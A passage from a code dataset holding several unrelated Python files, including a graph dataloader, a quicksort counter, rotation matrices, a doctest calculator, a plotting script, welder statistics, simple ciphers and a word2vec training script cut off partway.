'have_diag'], edge_attrs=['weight'])\n\n print(f'normal_class is {args.normal_class}')\n\n labels, train_mask, val_mask, test_mask = one_class_processing((graph, label), 0, args)\n\n # features = torch.FloatTensor(nx.attr_matrix(graph, node_attr=\"combine\", normalized=True))\n print(train_mask)\n features = torch.FloatTensor(list(nx.get_node_attributes(graph, 'combine').values()))\n print(features.shape)\n labels = torch.LongTensor(labels)\n train_mask = torch.BoolTensor(train_mask)\n val_mask = torch.BoolTensor(val_mask)\n test_mask = torch.BoolTensor(test_mask)\n in_feats = features.shape[1]\n # n_classes = data.num_labels\n n_classes = 2\n n_edges = graph.number_of_edges()\n print(test_mask.sum().item())\n # print(\"\"\"----Data statistics------'\n # #Edges %d\n # #Classes %d\n # #Train samples %d\n # #Val samples %d\n # #Test samples %d\"\"\" %\n # (n_edges, n_classes,\n # train_mask.sum().item(),\n # val_mask.sum().item(),\n # test_mask.sum().item()))\n print(n_edges, n_classes,\n train_mask.sum().item(),\n val_mask.sum().item(),\n test_mask.sum().item())\n if args.gpu < 0:\n cuda = False\n else:\n cuda = True\n torch.cuda.set_device(args.gpu)\n features = features.cuda()\n labels = labels.cuda()\n train_mask = train_mask.cuda()\n val_mask = val_mask.cuda()\n test_mask = test_mask.cuda()\n\n # graph preprocess and calculate normalization factor\n g = graph\n\n # add self loop\n if args.self_loop:\n g.remove_edges_from(nx.selfloop_edges(g))\n #g=transform.remove_self_loop(g)\n #if args.module!='GraphSAGE':\n g.add_edges_from(zip(g.nodes(), g.nodes()))\n\n # g = DGLGraph(g)\n g = dgl.from_networkx(graph)\n n_edges = g.number_of_edges()\n if args.norm:\n \n # normalization\n degs = g.in_degrees().float()\n norm = torch.pow(degs, -0.5)\n norm[torch.isinf(norm)] = 0\n if cuda:\n norm = norm.cuda()\n g.ndata['norm'] = norm.unsqueeze(1)\n\n datadict={'g':g,'features':features,'labels':labels,'train_mask':train_mask,\n 'val_mask':val_mask,'test_mask': test_mask,'input_dim':in_feats,'n_classes':n_classes,'n_edges':n_edges}\n\n return datadict, graph\n\ndef emb_dataloader(args):\n # load and preprocess dataset\n data = load_data(args)\n 
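# one-class setup: one_class_processing treats the chosen normal class as inliers and returns labels plus train/val/test masks\n    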
normal_class=args.normal_class\n labels,train_mask,val_mask,test_mask=one_class_processing(data,normal_class,args)\n\n features = torch.FloatTensor(data.features)\n labels = torch.LongTensor(labels)\n train_mask = torch.BoolTensor(train_mask)\n val_mask = torch.BoolTensor(val_mask)\n test_mask = torch.BoolTensor(test_mask)\n in_feats = features.shape[1]\n n_classes = data.num_labels\n n_edges = data.graph.number_of_edges()\n print(\"\"\"----Data statistics------'\n #Edges %d\n #Classes %d\n #Train samples %d\n #Val samples %d\n #Test samples %d\"\"\" %\n (n_edges, n_classes,\n train_mask.sum().item(),\n val_mask.sum().item(),\n test_mask.sum().item()))\n\n g = data.graph\n\n\n datadict={'g':g,'features':features,'labels':labels,'train_mask':train_mask,\n 'val_mask':val_mask,'test_mask': test_mask,'in_feats':in_feats,'n_classes':n_classes,'n_edges':n_edges}\n\n return datadict","repo_name":"mtang724/OCGNN","sub_path":"datasets/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3959112809","text":"import gdown\nimport sys\n\nsys.setrecursionlimit(100_000_000)\n\n\ndef swap(arr, a, b):\n arr[a], arr[b] = arr[b], arr[a]\n\n\ndef pivot1(arr, l):\n return arr[l]\n\n\ndef pivot2(arr, l, r):\n # pivotを常に先頭に持ってくるためにswapする\n swap(arr, l, r)\n return pivot1(arr, l)\n\n\ndef pivot3(arr, l, r): # 配列の先頭、真ん中、最後の要素の中央値を返す\n m = l + ((r - l) // 2)\n\n tmp = [arr[l], arr[m], arr[r]]\n\n mx = max(tmp)\n mn = min(tmp)\n\n tmp.remove(mx)\n tmp.remove(mn)\n\n mid_idx = arr.index(tmp[0])\n swap(arr, l, mid_idx)\n\n return pivot1(arr, l)\n\n\ndef partition(arr, l, r): # l, r: 各ルーティン内の探索範囲\n if l >= r:\n return 0\n\n # p = pivot1(arr, l)\n # p = pivot2(arr, l, r)\n p = pivot3(arr, l, r)\n\n i = l + 1\n\n for j in range(l+1, r+1):\n if arr[j] < p:\n swap(arr, j, i)\n i += 1\n\n swap(arr, arr.index(p), i-1)\n\n m = partition(arr, l, i - 2)\n n = partition(arr, i, r)\n\n return m + n + (r - l) # 長さmのsubarrayがあるとすると m - 1 = r - l\n\n\ndef main():\n url = 'url of input file'\n output = 'file.txt'\n gdown.download(url, output, quiet=False)\n\n with open(output) as f:\n numbers = [int(s.strip()) for s in f.readlines()]\n\n ans = partition(numbers, 0, len(numbers) - 1)\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sy-tencho/algorithms_specialization","sub_path":"part1/week3/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"453378465","text":"import numpy as np\n\n# Define Rotation Matrix (4X4)\nclass Rotation:\n def E():\n E = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 0]])\n return E\n\n def x(theta):\n theta = np.deg2rad(theta)\n Rot_x = np.array([[1, 0, 0, 0],\n [0, np.cos(theta), -np.sin(theta), 0],\n [0, np.sin(theta), np.cos(theta), 0],\n [0, 0, 0, 0]])\n return Rot_x\n\n def y(theta):\n theta = np.deg2rad(theta)\n Rot_y = np.array([[np.cos(theta), 0, np.sin(theta), 0],\n [0, 1, 0, 0],\n [-np.sin(theta), 0, np.cos(theta), 0],\n [0, 0, 0, 0]])\n return Rot_y\n\n def z(theta):\n theta = np.deg2rad(theta)\n Rot_z = np.array([[np.cos(theta), -np.sin(theta), 0, 0],\n [np.sin(theta), np.cos(theta), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 0]])\n return Rot_z\n\n\n# Define Translation Matrix (4X4)\ndef Translation(x, y, z):\n P = np.array([[0, 0, 0, x],\n [0, 0, 0, y],\n [0, 0, 0, z],\n [0, 0, 0, 
1]])\n    return P\n\n\n# calculate Homogeneous Transformation matrix\ndef HT_matrix(R, P):\n    # Note : R&P are np_array form\n    H = R + P\n    return H","repo_name":"tmjeong1103/Forward_Kinematics_hardcoding","sub_path":"FK_simul/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74985196213","text":"# -*- coding: utf-8 -*- \nimport sys\nimport math\nimport logging\nimport doctest\n\n\nlogging.basicConfig(filename='program.log', format='%(asctime)s %(message)s',level=logging.DEBUG)\n\n\n# Function definitions \ndef soma(arg1, arg2):\n    \"\"\"\n    >>> soma(2, 2) # addition tests\n    4\n    >>> soma(1, 1)\n    2\n    >>> soma(-2, 4)\n    2\n    \"\"\" \n    print(arg1 + arg2)\n\ndef subt(arg1, arg2):\n    \"\"\"\n    >>> subt(2, 2) # subtraction tests \n    0\n    >>> subt(10, 1)\n    9\n    >>> subt(-2, 4)\n    -6\n    \"\"\"\n    print(arg1 - arg2)\n\ndef mult(arg1, arg2):\n    \"\"\"\n    >>> mult(2, 2) # multiplication tests\n    4\n    >>> mult(10, 10)\n    100\n    >>> mult(-2, 4)\n    -8\n    \"\"\"\n    print(round((arg1 * arg2), 2))\n\ndef div(arg1, arg2):\n    \"\"\"\n    >>> div(2, 2) # division tests\n    1.0\n    >>> div(10, 2)\n    5.0\n    >>> div(2, 4)\n    0.5\n    \"\"\"\n    try:\n        print(round((arg1 / arg2), 2))\n    except Exception as e: # handle the division-by-zero error\n        logging.exception(\"Exception Occurred\")\n\ndef pot(arg1, arg2):\n    \"\"\"\n    >>> pot(2, 2) # power tests\n    4.0\n    >>> pot(10, 3)\n    1000.0\n    >>> pot(5, 4)\n    625.0\n    \"\"\"\n    print(round(math.pow(arg1, arg2), 2))\n\ndef mod(arg1, arg2):\n    \"\"\"\n    >>> mod(2, 2) # modulo tests\n    0\n    >>> mod(10, 3)\n    1\n    >>> mod(1235, 4)\n    3\n    \"\"\"\n    print(round((arg1 % arg2), 2))\n\ndef main():\n\n    if len(sys.argv) == 4: # array length check to verify the number of arguments\n    \n        # Create variables to store the values passed on the command line\n        try:\n            arg1 = float (sys.argv[1])\n            arg2 = float (sys.argv[3])\n            argOperador = sys.argv[2]\n            logging.info('Calculator app started with values: %.2f and %.2f', arg1, arg2) # log showing the initial values\n            try:\n                if argOperador == '+':\n                    soma(arg1, arg2)\n                elif argOperador == '-':\n                    subt(arg1, arg2)\n                elif argOperador == '*':\n                    mult(arg1, arg2)\n                elif argOperador == '/':\n                    div(arg1, arg2)\n                elif argOperador == '**':\n                    pot(arg1, arg2)\n                elif argOperador == 'mod' or argOperador == '%':\n                    mod(arg1, arg2)\n                else: \n                    print(\"Error: invalid operation.\")\n            except Exception as e:\n                logging.exception(\"Exception Occurred\") \n        except Exception as e:\n            logging.error(\"Error: the arguments must be numeric.\") # exception handling when the inputs are not numeric\n    else:\n        logging.error(\"Error: the expression must be a simple one.\") # exception handling when there are more than 2 initial arguments\n    \n    \n    doctest.testmod()\nmain()\n","repo_name":"FabbSantos/calculadora_proj","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70754997812","text":"import sys\n\nimport unittest\n\nsys.path.append('neuxus')\nsys.path.append('tests/nodes')\n\nfrom utils import (INDEX, COLUMN, simulate_loop_and_verify)\nfrom chunks import Port\nfrom nodes.function import ApplyFunction\n\n\nclass TestFunction(unittest.TestCase):\n\n    def test_apply_function(self):\n        # create a Port and a Node\n        port = Port()\n        port.set_parameters(\n            data_type='signal',\n            channels=COLUMN,\n            sampling_frequency=250,\n            meta={})\n        node = ApplyFunction(port, lambda x: x**2)\n\n        # simulate NeuXus loops\n        simulate_loop_and_verify(port, node, self)\n","repo_name":"LaSEEB/NeuXus","sub_path":"tests/nodes/test_function.py","file_name":"test_function.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"34025205057","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\n'''\nExpect to have a file like that:\nlist of [perfs, stds, q, q_diff, q_diff_abs, err_proj, err_proj_abs]\nperfs, stds, err_proj, err_proj_abs have:\n - a list of [P1, P2, P4...]\n - each with a list of [iter1, iter2, ...]\nq, q_diff, q_diff_abs have:\n - a list of [P1, P2, P4...]\n - each with a list of items evaluated in [sa, sa_greedy, s0a_greedy]\n - each with a list of [iter1, iter2, ...]\n \n'''\n\nfile_name = sys.argv[1]\ncolors = ['dodgerblue', 'cyan', 'limegreen', 'chartreuse', 'gold', 'orange', 'r', 'm', 'darkorchid']\ndalton_friendly_colors = ['deepskyblue', 'mediumslateblue', 'deeppink', 'darkorange', 'gold']\n\nfinal_colors = colors\nsa_index = 0  # 0 for sa, 1 for sa_greedy, 2 for s0a_greedy\ngamma_default = 0.99 ** (1/3)\n\nwith open(file_name, 'r') as f:\n    file = json.load(f)\n\n'''\nsave_step added later in position [7], if len(file)==7 there is no save_step\n'''\nif len(file) >= 8:\n    save_step = file[7]\nelse:\n    save_step = 1\n\n'''\ngamma added later in position [8], if len(file)<9 there is no gamma\n'''\nif len(file) >= 9:\n    gamma = file[8]\nelse:\n    gamma = gamma_default\n\npersistences_number = len(file[0])\n\n# file filtering\n# for i in range(2):\n#     for j in range(len(file[i+3])):\n#         for k in range(len(file[i + 3][j])):\n#             if len(file[i+3][j][k]) is not 0:\n#                 file[i+3][j][k].pop(0)\n#\n# for i in range(len(file)):\n#     if i < 2 or i > 4:\n#         for j in range(len(file[i])):\n#             if file[i][j] != []:\n#                 file[i][j].pop(0)\n#\n# for j in range(len(file[2])):\n#     for k in range(len(file[2][j])):\n#         del file[2][j][k][-1]\n\nvalid_iterations_perfs = []\nfor i in range(persistences_number):\n    l = list(range(len(file[0][i])))\n    valid_iterations_perfs.append([(j * max(2 ** i, save_step)) + max(2 ** i, save_step) for j in l])\n\nvalid_iterations_bound = []\nfor i in range(persistences_number):\n    l = list(range(len(file[2][i][0])))\n    valid_iterations_bound.append([(j * max(2 ** i, save_step)) for j in l])\n\nfig, ax = plt.subplots(nrows=2, ncols=2)\n\n# plot perf\n# ax[0][0].set(ylabel='performances')\n# for i in range(persistences_number):\n#     ax[0][0].plot(valid_iterations[i], file[0][i], '.', color=final_colors[i], label='P{}'.format(2**i))\n#     
ax[0][0].errorbar(valid_iterations[i], file[0][i], yerr=file[1][i], linestyle='', color=final_colors[i])\n\nax[0][0].set(ylabel='performances')\nfor i in range(persistences_number):\n ax[0][0].plot(valid_iterations_perfs[i], file[0][i], '-', color=final_colors[i], label='P{}'.format(2**i))\n\n# plot q\nax[1][0].set(ylabel='Q_functions')\nfor i in range(persistences_number):\n ax[1][0].plot(valid_iterations_bound[i], file[2][i][2], '-', color=final_colors[i])\n\n# plot q_diff_abs\nax[0][1].set(ylabel='Q_diff_abs')\nfor i in range(persistences_number):\n ll = min(len(valid_iterations_bound[i]), len(file[4][i][0]))\n ax[0][1].plot(valid_iterations_bound[i][:ll], file[4][i][0][:ll], '-', color=final_colors[i])\n\n# plot bound abs\nax[1][1].set(ylabel='Q(sa0greedy) - Q_diff_abs(sa)')\nfor i in range(persistences_number):\n ll = min(len(valid_iterations_bound[i]), len(file[4][i][0]))\n bound = file[2][i][2][:ll] - ((1-gamma**(2**i)) ** -1) * (np.array(file[4][i][0][:ll]))\n ax[1][1].plot(valid_iterations_bound[i], bound, '-', color=final_colors[i])\n\nax[0][0].legend(ncol=len(file[0]), bbox_to_anchor=(0, 1), loc='lower left', fontsize='small')\n\nplt.show()\n","repo_name":"albertometelli/pfqi","sub_path":"plotters/multi_perf_plotter4x4.py","file_name":"multi_perf_plotter4x4.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"34467271761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 20 09:18:43 2021\n\n@author: CWilson\n\"\"\"\n\nimport sys\nsys.path.append('c://users//cwilson//documents//python//Weekly Shop Hours Project//')\n# from TimeClock_Tools_Employee_Department import download_most_current_employee_department_csv\n# from Grab_Fabrication_Google_Sheet_Data import grab_google_sheet\nfrom Grab_Defect_Log_Google_Sheet_Data import grab_defect_log\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom Fitter_Welder_Stats_functions import clean_and_adjust_fab_listing_for_range\nfrom Fitter_Welder_Stats_functions import return_sorted_and_ranked\nfrom Fitter_Welder_Stats_functions import convert_weight_to_earned_hours\nfrom Fitter_Welder_Stats_functions import get_employee_name_ID\nfrom Fitter_Welder_Stats_functions import download_employee_group_hours\nfrom Fitter_Welder_Stats_functions import get_employee_hours\nfrom Fitter_Welder_Stats_functions import combine_multiple_all_both_csv_files_into_one_big_one\nfrom Gather_data_for_timeclock_based_email_reports import get_information_for_clock_based_email_reports\nfrom Gather_data_for_timeclock_based_email_reports import skip_timeclock_automated_retrieval\nfrom Gather_data_for_timeclock_based_email_reports import get_ei_csv_downloaded\n\n\n\nstate = 'TN'\nstart_date = \"01/01/2023\"\nend_date = \"01/31/2023\"\nstates = ['TN','MD','DE']\n\n\n\n# ei = get_employee_name_ID()\n# hours_df = download_employee_group_hours(start_date, end_date)\n\n\n# basis = get_information_for_clock_based_email_reports(start_date, end_date, exclude_terminated=False)\n\n\n\nei = get_ei_csv_downloaded(exclude_terminated=False)\n\nstart_dt = datetime.datetime.strptime(start_date, '%m/%d/%Y')\nend_dt = datetime.datetime.strptime(end_date, '%m/%d/%Y')\n\n\nclock_df, direct, indirect = None, None, None\n\n\nfor num_day in range(0, (end_dt-start_dt).days + 1):\n# for num_day in range(0,7):\n \n day_str = (start_dt + datetime.timedelta(days=num_day)).strftime('%m/%d/%Y')\n \n try:\n this_day = get_information_for_clock_based_email_reports(day_str, 
day_str, exclude_terminated=False, ei=ei)\n if this_day is None:\n continue\n except:\n continue\n \n\n \n # should not hit this part if this_day is none\n loop_clock_df = this_day['Clocks Dataframe']\n loop_direct_df = this_day['Direct']\n loop_indirect_df = this_day['Indirect']\n \n \n #iteratively add each days data to a main dataframe\n if clock_df is None:\n clock_df = loop_clock_df\n else:\n clock_df = clock_df.append(loop_clock_df, ignore_index=True)\n if direct is None:\n direct = loop_direct_df\n else:\n direct = direct.append(loop_direct_df, ignore_index=True)\n if indirect is None:\n indirect = loop_indirect_df\n else:\n indirect = indirect.append(loop_indirect_df, ignore_index=True) \n \n\n\n\nhours_df = clock_df\n\n\n\n\n\n\nfor state in states:\n print(state)\n # get the defect log data for that time range\n # this way it only pulls the defect log information once per state\n defect_log = grab_defect_log(state, start_date, end_date)\n \n # get the dataframe of FabListing for that time range & state\n fablisting_cleaned = clean_and_adjust_fab_listing_for_range(state, \n start_date, \n end_date, \n earned_hours = 'model')\n # earned_hours='old way')\n df = fablisting_cleaned['Fab df']\n # df = df.rename(columns={'Earned Hours':'EVA Hours'})\n # it also gets the unique fitters and welders from the dataframe\n fitters = fablisting_cleaned['Fitter list']\n welders = fablisting_cleaned['Welder list']\n \n \n ''' IF EITHER OF THE FITTER_DATA OR WELDER_DATA THROWS AN ERROR REFER TO THE DEFINED FUNCTION '''\n ''' Or you can just run from line 72 down to these functions and look at the printed output '''\n # get only the fitter information retrieved form the dataframe\n fitter_data = return_sorted_and_ranked(df, ei, fitters, \"Fitter\", defect_log, state, \n start_date, end_date)\n # get only the welder information retrieved form the dataframe\n welder_data = return_sorted_and_ranked(df, ei, welders, \"Welder\", defect_log, state, \n start_date, end_date)\n \n # fitter_data = convert_weight_to_earned_hours(state, fitter_data, drop_job_weights=True)\n # welder_data = convert_weight_to_earned_hours(state, welder_data, drop_job_weights=True)\n \n \n \n \n # if it is the first state in the list, create a dataframe from the current dataframes\n if state == states[0]:\n all_fitters = fitter_data.copy().reset_index(drop=True)\n all_welders = welder_data.copy().reset_index(drop=True)\n # if it is not the first state, jsut append the data to the company wide dataframe\n else:\n all_fitters = all_fitters.append(fitter_data, ignore_index=True)\n all_welders = all_welders.append(welder_data, ignore_index=True)\n \n \n \n# where to put the csv files\ndirectory = 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//'\n# create a timestamp so as not to override files\nfile_timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n# the time span of when the file was created for\nfile_range = start_date.replace('/','-') + '_to_' + end_date.replace('/','-')\n# the end of the file name is the file range and creation timestamp \nfile_name_end = '_' + file_range + '_' + file_timestamp + '.csv'\n# convert the fitter_data df to a csv\n# fitter_data.to_csv(file_name_start + 'fitters' + file_name_end)\n# # convert the welder_data df to a csv\n# welder_data.to_csv(file_name_start + 'welders' + file_name_end)\n\n\n\nall_fitters_grouped = get_employee_hours(all_fitters, direct, indirect)\nall_fitters_grouped = all_fitters_grouped.round(3)\nall_welders_grouped = 
get_employee_hours(all_welders, direct, indirect)\nall_welders_grouped = all_welders_grouped.round(3)\n\n# combine\nall_both = all_fitters_grouped.append(all_welders_grouped)\nall_both = all_both.sort_values(by=['Classification','Weight'], ascending=False)\nall_both.to_csv(directory + 'all_both' + file_name_end)\n\n\n# after completing the loop, convert all_fitters to a csv\nall_fitters_grouped.to_csv(directory + 'all_fitters' + file_name_end)\n# after completing the loop, convert all_welders to a csv\nall_welders_grouped.to_csv(directory + 'all_welders' + file_name_end)\n\nprint(directory + 'all_both' + file_name_end)\n\n\n\n# all_both_csvs = ['c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_12-01-2022_to_12-31-2022_2023-01-10-18-15-56.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_11-01-2022_to_11-30-2022_2023-01-11-10-52-01.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_10-01-2022_to_10-31-2022_2023-01-12-10-46-09.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_09-01-2022_to_09-30-2022_2022-10-14-12-01-38.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_08-01-2022_to_08-31-2022_2022-10-14-08-17-24.csv',\n# 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_07-01-2022_to_07-31-2022_2022-10-13-18-05-02.csv']\n\n# combine_multiple_all_both_csv_files_into_one_big_one(all_both_csvs, 'c://users//cwilson//documents//Fitter_Welder_Performance_CSVs//all_both_6month_July012022_December312022.csv')\n\n","repo_name":"cwilsonCrystalSteel/Python","sub_path":"Fitter_Welder_Stats.py","file_name":"Fitter_Welder_Stats.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31033793334","text":"# It's not clear whether the function should return bool or comparison diff.\n# Assume, that we have mypy and input params have correct format\n# The order in lists matters\nimport math\nfrom typing import Any\n\nFLOAT_COMPARISON_PRECISION = 0.00001\n\n\ndef compare(item1: Any, item2: Any) -> bool:\n if type(item1) != type(item2):\n return False\n if isinstance(item1, dict):\n return is_jsons_equal(item1, item2)\n if isinstance(item1, float):\n return math.isclose(item1, item2, abs_tol=FLOAT_COMPARISON_PRECISION)\n return item1 == item2\n\n\ndef is_jsons_equal(first_json: dict, second_json: dict) -> bool:\n if not first_json and not second_json:\n return True\n if first_json.keys() != second_json.keys():\n return False\n for key, val in first_json.items():\n if not compare(val, second_json[key]):\n return False\n return True\n","repo_name":"wkomor/VL_test","sub_path":"jsons_equality.py","file_name":"jsons_equality.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5162457404","text":"def list_manipulation(lst,command,loc,value=None):\n if command == \"remove\" and value == None:\n if loc == \"end\":\n return lst.pop()\n return lst.pop(0)\n if command == \"add\":\n if loc == \"beginning\":\n \tlst.insert(0,value)\n \treturn lst\n else:\n \tlst.append(value)\n \treturn 
lst\n\nprint(list_manipulation([1,2,3,4],\"add\",\"end\",47))","repo_name":"ksompura/python_training","sub_path":"function_excersises/list_manipulation.py","file_name":"list_manipulation.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5124208291","text":"hlam = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\nhohol = {hlam[i].upper(): i for i in range(len(hlam))}\nhohol_back = {i: hlam[i].upper() for i in range(len(hlam))}\n\n\ndef cezar_ukr(string, p, m):\n    res = \"\"\n    for i in range(len(string)):\n        l = (hohol[string[i].upper()] * p + m) % 26\n        res += hohol_back[l]\n    return res\n\n\ndef vigenere_encrypt_ukr(plaintext, key):\n    key_length = len(key)\n    key_as_int = [hohol[i] for i in key]\n    plaintext_int = [hohol[i] for i in plaintext]\n    print(key_as_int, plaintext_int)\n    ciphertext = ''\n    for i in range(len(plaintext_int)):\n        value = (plaintext_int[i] + key_as_int[i % key_length]) % 26\n        ciphertext += hohol_back[value]\n    return ciphertext\n\n\ndef vigenere_decrypt_ukr(ciphertext, key):\n    key_length = len(key)\n    key_as_int = [hohol[i] for i in key]\n    ciphertext_int = [hohol[i] for i in ciphertext]\n    print(key_as_int, ciphertext_int)\n    plaintext = ''\n    for i in range(len(ciphertext_int)):\n        value = (ciphertext_int[i] - key_as_int[i % key_length]) % 26  # must use the same 26-letter modulus as the encoder\n        plaintext += hohol_back[value]\n    return plaintext\n\n\nprint(vigenere_encrypt_ukr(\"haveaniceweek\".upper(), \"online\".upper()))\n","repo_name":"maxymkuz/cs_2","sub_path":"off_class_stuff/discrete/cyphers.py","file_name":"cyphers.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8525379826","text":"import pandas as pd\nimport re, os, csv, time\nimport nltk.data\nimport logging\n#from gensim import models\nfrom gensim.models import word2vec\nfrom bs4 import BeautifulSoup\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nWordNetLemmatizer = WordNetLemmatizer()\n\n# from nltk import word_tokenize, sent_tokenize\n# nltk.download()\ntokenizer = nltk.data.load('nltk:tokenizers/punkt/english.pickle')\n#Script that generates the word2Vec model\n\n\n\n# AUXILIARY FUNCTIONS #\n# Determines whether a tag belongs to a verb\ndef isVerbTag(tag):\n    return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']\n\n# Does the lemmatizing of a specific pos recognition (word, tag)\n# NOTE: We have to run POS tagging first, since we need to \"help\" the lemmatizer\n# by telling it which words are verbs\ndef lemmatizeWord(posTag):\n    word = posTag[0]\n    tag = posTag[1]\n    # print \"word: \", word, \" tag: \", tag\n    if isVerbTag(tag):\n        #print word,\" IS A VERB --- lemmatize: \", WordNetLemmatizer.lemmatize(word,pos='v')\n        return WordNetLemmatizer.lemmatize(word,pos='v')\n    else:\n        #print word,\" IS ANOTHER KIND OF WORD\"\n        return WordNetLemmatizer.lemmatize(word)\n\n\n# If text cleaning is not requested, we simply split the text\ndef news_to_wordlist(news, remove_stopwords=False,clean_text=True):\n    # This time we won't remove the stopwords and numbers\n    if clean_text:\n        # 0. Remove HTML tags\n        body = BeautifulSoup(news,\"html.parser\").get_text() \n        # 1. Replace all numbers with a \"NUM\" tag and all punctuation symbols with a single space\n        body = re.sub(\"[0-9]+\", \"NUM\", body)  # operate on the tag-stripped body from step 0, not the raw news\n        body = re.sub(\"[^a-zA-Z]\", \" \", body)\n        \n        # 2. 
Convert all characters in body to lower case\n        body = body.lower()\n        \n        # 3. TODO: Remove javascript code & URLS\n        body = re.sub('https?:\\/\\/.*[\\r\\n]*', \" \", body)\n    else:\n        body = news\n\n\n    # 4. Tokenize body\n    bodyWords = body.split()\n    \n    # 5. Remove stop-words from body\n    if remove_stopwords and clean_text:\n        stopSet = set(stopwords.words(\"english\"))\n        bodyWords = [word for word in bodyWords if not word in stopSet]\n    \n    if clean_text:\n        # # 6. POS tagging and Lemmatize body\n        posTagging = nltk.pos_tag(bodyWords)\n        bodyWords = list(map(WordNetLemmatizer.lemmatize,bodyWords))\n        bodyLemmatized = []\n        for taggedWord in posTagging:\n            bodyLemmatized.append(lemmatizeWord(taggedWord))\n        bodyWords = bodyLemmatized\n\n    #Returns a list of words\n    return(bodyWords)\n\n\n#Function to split a news piece into parsed sentences. Returns a \n# list of sentences, where each sentence is a list of words\ndef news_to_sentences(news, tokenizer=tokenizer, remove_stopwords=False, use_tokenizer=True,max_sentence_size=150):\n    if use_tokenizer:\n        # 1. Use the NLTK tokenizer to split the paragraph into sentences\n        raw_sentences = tokenizer.tokenize(news.strip())\n    else:\n        #raw_sentences = re.split( \"\\.\", news ) # Slower than the native str method\n        raw_sentences = news.split('.')\n    if len(raw_sentences) > max_sentence_size:\n        raw_sentences = raw_sentences[:max_sentence_size]\n\n    #Loop over each sentence\n    sentences = []\n    for raw_sentence in raw_sentences:\n        # If a sentence is empty, skip it\n        if len(raw_sentence) > 0:\n            # Otherwise, call news_to_wordlist to get a list of words\n            sentences.append(news_to_wordlist(raw_sentence,remove_stopwords))\n\n    #Return the list of sentences (each sentence is a list of words)\n    # So this returns a list of lists\n    return sentences\n\ndef trainWord2Vec(sentences,archiveTag):\n    logging.basicConfig(format='%(asctime)s: %(levelname)s : %(message)s', level=logging.INFO)\n\n    # Set values for various parameters\n    num_features = 300    # Word vector dimensionality\n    min_word_count = 15   # Minimum word count\n    num_workers = 4       # Number of threads to run in parallel\n    context = 35          # Context window size\n    downsampling = 1e-3   #Downsample setting for frequent words \n\n    # Initialize and train the model (this will take some time)\n    model = word2vec.Word2Vec(sentences, workers=num_workers, size=num_features, min_count=min_word_count, \\\n            window = context, sample=downsampling)\n\n    # If you don't plan to train the model any further, calling init_sims \n    # will make the model much more memory-efficient\n    model.init_sims(replace=True)\n\n    # It can be helpful to create a meaningful model name and\n    # save the model for later use. 
You can load it later using Word2Vec.load()\n    model_name = str(num_features) + \"features_\" + str(min_word_count) + \"minwords_\" + str(context) + \"context\" + archiveTag\n    model.save(model_name)\n    #models.Word2Vec.save_word2vec_format(model_name)\n    return model_name\n\n# def makeWord2VecModel(trainStance):\ndef makeWord2VecModel():\n    basePath = \"./fnc-1-original/\"\n    outputDir = basePath + \"cleanDatasets/\"\n    # if trainStance:\n    #     inputFilePath = basePath + \"train_stances.csv\" \n    #     fileTag = \"STANCES\"\n    # else:\n    #     inputFilePath = basePath + \"train_bodies.csv\" \n    #     fileTag = \"BODIES\"\n    \n    # stancesFilePath = basePath + \"train_stances.csv\"\n    # bodiesFilePath = basePath + \"train_bodies.csv\"\n\n    fileTag = \"ALL\"\n\n    # textTag = 'articleBody' if trainStance==False else 'Headline'\n    # # Read the labeled and unlabeled files\n    # bodiesTrainFile = pd.read_csv(bodiesFilePath,header=0,delimiter=\",\", quoting=1)\n    # stancesTrainFile = pd.read_csv(stancesFilePath,header=0,delimiter=\",\", quoting=1)\n    # print(\">>> Read file \", bodiesFilePath , \"shape:\", bodiesTrainFile.shape)\n    # print(\">>> Read file \", stancesFilePath , \"shape:\", stancesTrainFile.shape)\n    \n    aggregated_train_path = 